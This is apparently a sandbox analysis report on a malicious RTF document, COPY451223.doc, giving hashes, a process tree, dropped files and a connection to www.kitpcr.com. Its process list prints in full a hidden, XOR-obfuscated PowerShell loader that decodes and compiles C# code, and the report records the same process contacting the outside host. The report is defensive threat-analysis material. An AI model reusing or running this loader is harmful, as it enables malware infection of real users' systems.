File name: | COPY451223.doc |
Full analysis: | https://app.any.run/tasks/c822c027-49bd-46e5-be77-72ca481a3acf |
Verdict: | Malicious activity |
Analysis date: | September 19, 2019, 07:52:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | C5C703790F61135548961CB3B16D4DF0 |
SHA1: | 10255D5AC18E25CD5EAF9C757A5EFF2A0DAC19A6 |
SHA256: | DF9FD04955293472FAAFDBB2FF3163C4FD8916ABCD190F4884F6F453734325B2 |
SSDEEP: | 768:oZMrYyYDE+qR18d3ncYgIrffBKo8yRG9XUc4K9IQriN1Q/VuNU8f9/D/6HQIID7S:oZdRVXcirffa0hyH6D7vc64An1S |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3540 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\COPY451223.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2528 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2336 | powershell -WindowStyle Hidden function r8a21 { param($v3d2a) $dd717 = 'yccadbb';$g52f7ba = ''; for ($i = 0; $i -lt $v3d2a.length; $i+=2) { $zad526d = [convert]::ToByte($v3d2a.Substring($i, 2), 16); $g52f7ba += [char]($zad526d -bxor $dd717[($i / 2) % $dd717.length]); } return $g52f7ba; } $lbc469e = '0c100a0f034231001017040959170a0a0d0644311b0a17060c4a301717170a0c014c2b171706130b12311c111508070711421610080a05422a1a1015010f4c3d0a02060a0d110d0a00125f1711100d0441371b110d060e4f2d2d590c100a0f03423100101704094c2c1c17586c6e12171b0f0a0244010e181010410e01534a05183a200e0e300e130e16164a5b0806130a070e4a51414d210c160b1a330e0d0c1644412404103210160022050010070a1041483942120c010f080742110d021708074207011706130a422b171733151642171c5a5056054a2b171733151642084f565a55574e110d110a0f0342061f5b05594d59393d0f0f2809120d0b174b430f071017060f5256404e59260d15161b32160a0d15445f425b2f0c00002e0b1b1102131d404b24431314060e0b1a43101505160b1a43061910071017432a0f1032160b430b525d06074a4b1015160b0c1e4317045555531f524a5a3f260e152a0e110b101651410804160c071550514348422717171118340d0b17175e43320b100d16020d34100d0d060015464b3f59131603080b0159101700100b0159061b1501100c59010c0e0842071a0051054c2b0c0d331713440053185b5b4d312b0c0d331713441b511c01544d44170b171743195107531a5b4f410b171659160a0f1042161a0702594d59393d0f0f2809120d0b174b432f071017060f52564c06150f414d44270c0d111a310b0b0c0d5e4133100e2f1615062c010f0d0b1a414d4431070d2f02121027100b0c115c02030e0a064a3c44111618170a0244071a0d06110f44140d1007431851565b4c4b2a0f1032160b430e000055011b514f280a16320d1143110107571b4f0a0f10421618550157575b4b42131603080b0159101700100b01590a0d154406014b0600584c4b19300d1731101042155250005c5654595e4309575b061c504b135c0350484b41505c5207485353595003524f53065051404b50580a074c0e534a025b55525f5f300d173110104c2306110e4d190516170c4115035b4f07581c2d0c16291711410b04071d515054591707405054004c0e534a025b55524e10410251504c40514153065054525a4a5453505451534e51525052525549515356555240504a5808024a0d1f06075357575f442a0d15341610573906130b4b191e0c170e4413
034055075a19372b171733151642081802575251075f51362a0f1032160b4a565a110b0c0d431b070753034f545e515f0b0451420602075006510c05040050514c4f09000556514c064f511c5652550c1615441a041a520257534b4b02040c150b4213185a55055f1f200017063a3942071b060650565f19491b505048521a1f054f511c5b5204582a0f1032160b431600010700442e0213170a03154d220d080d0131240f0e06030e51504a5a2903100a0b020d4a210d091a4b0406070748514f514817031c06014d574b5900565758514a0c1c1443280a16320d114b0e0207064b50564f300d2b171755554c4b49491b535155004b5516020401004e4a4a5810055b541d594336010021150a060f1042081c5b5155505f0c1c144336010021150a060f104a4b421017130d0c055901555357555f3c0d1508160d0c14060d154a25070d250c0d000710290217094c270c0f0a110e0a0f0717174d3214070110020f270b0e061c114d2014120e100002150d0d0c3d0217004d4940253f17050654515b481159055053514156565454531b5357434d59081c5b5155504c2616140d0d0b03063f0a0f044c105a18515249465353485452565553534e565b550057544857525555545618535a5106520648505351555156185352510053564d005251555a534e570752005354485552565553534852555353565a4c5651505150574951575507530148015357464b4e1b555152534b5929110c020111112a170213102b0c1f0c4315565b074b5e0d041342320b0c00041711310d0211152d0c04164b0157565155505833130b01070a104d321003100d4b17535d0750505811041017101743535a1912171b0f0a0244111618170a024411160b0a0d0644105a18515249171610100d04410954001a5b4a1a171610100d04410e54574057505c461b011a0207030640590a1711080a054211505a0501515f2a1711080a054c3c0e13151d590416114b080a1642105e535a0d5e0f4f0100594a2e07170417095f0b4944514a1a061b161c4316045d5155185e200e0a14070b174d350b201b0d064b0c520001414d30140611160b0a0d064c0b4e4b4a4f50524b5911505a05015149444b000905104b51160658575503593d430b52575b4d5038490d4d50504346410e54574057504f28070c1e170b3c4d591f0b061714160c4211505a05015159041e'; $lbc469e2 = r8a21($lbc469e); Add-Type -TypeDefinition $lbc469e2; [jc13f]::dc2ec9(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2836 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2628 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2440 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESADAB.tmp" "c:\Users\admin\AppData\Local\Temp\CSCADAA.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2996 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR99C4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2528 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA27E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2336 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O8W836EZVAW9SK4P2XF2.temp | — | |
MD5:— | SHA256:— | |||
2836 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVRAA6D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2836 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DFBD812B8422B46896.TMP | — | |
MD5:— | SHA256:— | |||
3540 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF9A59E89DBF6937A2.TMP | — | |
MD5:— | SHA256:— | |||
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCADAA.tmp | — | |
MD5:— | SHA256:— | |||
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.pdb | — | |
MD5:— | SHA256:— | |||
2440 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESADAB.tmp | — | |
MD5:— | SHA256:— | |||
2628 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.dll | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2336 | powershell.exe | 162.241.128.67:443 | www.kitpcr.com | CyrusOne LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.kitpcr.com | | suspicious |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|